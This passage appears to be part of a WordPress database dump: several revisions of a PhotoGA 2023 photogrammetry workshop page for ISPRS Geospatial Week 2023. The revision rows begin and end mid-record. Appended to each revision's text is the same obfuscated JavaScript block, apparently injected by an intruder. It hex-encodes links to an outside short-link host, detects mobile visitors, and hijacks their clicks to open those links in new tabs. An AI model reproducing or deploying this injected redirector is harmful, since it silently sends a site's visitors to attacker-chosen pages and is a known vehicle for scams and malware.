_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 13:57:53','2022-12-16 13:57:53','',3449,'https://gsw2023.com/?p=3467',0,'revision','',0),
(3468,1,'2022-12-16 13:59:23','2022-12-16 13:59:23','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 13:59:23','2022-12-16 13:59:23','',3449,'https://gsw2023.com/?p=3468',0,'revision','',0),
(3469,1,'2022-12-16 14:00:01','2022-12-16 14:00:01','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:00:01','2022-12-16 14:00:01','',3449,'https://gsw2023.com/?p=3469',0,'revision','',0),
(3470,1,'2022-12-16 14:00:25','2022-12-16 14:00:25','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x